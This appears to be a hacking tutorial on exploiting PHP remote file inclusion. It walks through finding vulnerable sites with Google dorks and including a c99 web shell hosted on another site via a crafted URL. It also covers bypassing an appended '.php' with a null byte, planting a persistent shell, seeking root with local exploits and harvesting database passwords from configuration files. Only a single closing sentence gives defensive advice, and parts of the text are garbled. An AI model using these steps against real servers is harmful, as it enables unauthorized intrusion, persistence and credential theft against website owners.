There are many servers that are affected to this kind of hacks because the PHP’s settings of register_globals and allow_url_fopen are being enabled. PHP 6.0, register_globals has been removed, but also many websites still rely on older versions of PHP. Now I will give you steps that hackers take to exploit this kind of vulnerability.
1. First the hacker would find a website that’s get pages via the PHP include() function and is vulnerable to RFI. We will use Google dorks(See the meaning section to know about Google dorks) to locate servers vulnerable to RFI.
2. The Website should have its address similar to the below link:
http://vulnerablesite.com/index.php?page=PageName
3. Now at the PageName section we will but the address of a website it will look similar to the following:
http://vulnerablesite.com/index.php?page=http://google.com
4. Here we have put Google web address and after proceeding if the Google homepage shows up on the website, then we will know that it is Vulnerable to RFI and we will be ready to include the shell.
5. The popular shell is c99.r57 shell is also popular but I will discuss about c99 shell here. We will use Google dork to find the c99 shell here. To find the shell using Google dork we should search inurl: c99.txt in Google.
This will display websites with that shell. NOTE: In the end of the URL add ?(Question mark sign)
So the New URL would look like this :
http://vulnerablesite.com/index.php?page=http://site.com/c99.txt?
6. Sometimes on the script i.e. in PHP the server appends “.php” and end of the included file. So if you include the c99 shell, it would look like this “c99.txt.php” and that will not work. So to fix it, you should you should add a null byte i.e. to the end of c99.txt. tells the server to ignore everything that is there after c99.txt.
7. To search for the RFI vulnerable site you should search allinurl:.php?page= in Google. This search will look for URL’s with .php?page=. You most likely won’t find any vulnerable sites with that search so you can even search switching around the word “page” with other similar words. We can even search in vulnerability databases like www.osvdb.org for already discovered RFI vulnerabilities that are running that vulnerable web application with a Google dork.
8. If you get successful with this attack then you will get a big shell screen.
It will display all the info’s about the server like files and directories on it. From here you can find a directory that both read and write privileges and upload the shell but there will be .php file so that vulnerability in the website will be fixed already fixed, and you can be able to access them later.
9. Now you should find a way to gain root privileges on the server. You can do this by uploading and running local exploits . You should also search the targets server for configuration. It may contain username and passwords for the databases and other private information.
To protect yourself from RFI attacks, disable register_globals and allow_url_fopen from your php.ini file and always use Updated scripts simply make sure you are using up-to-date scripts, and make sure you server php.ini file has disabled.
Important Meanings
Shell - a graphical interface that let you to browse remote file and for running your own made code.
Google Dork - Google dork the process of taking advantages of Google Search to get specific search result.
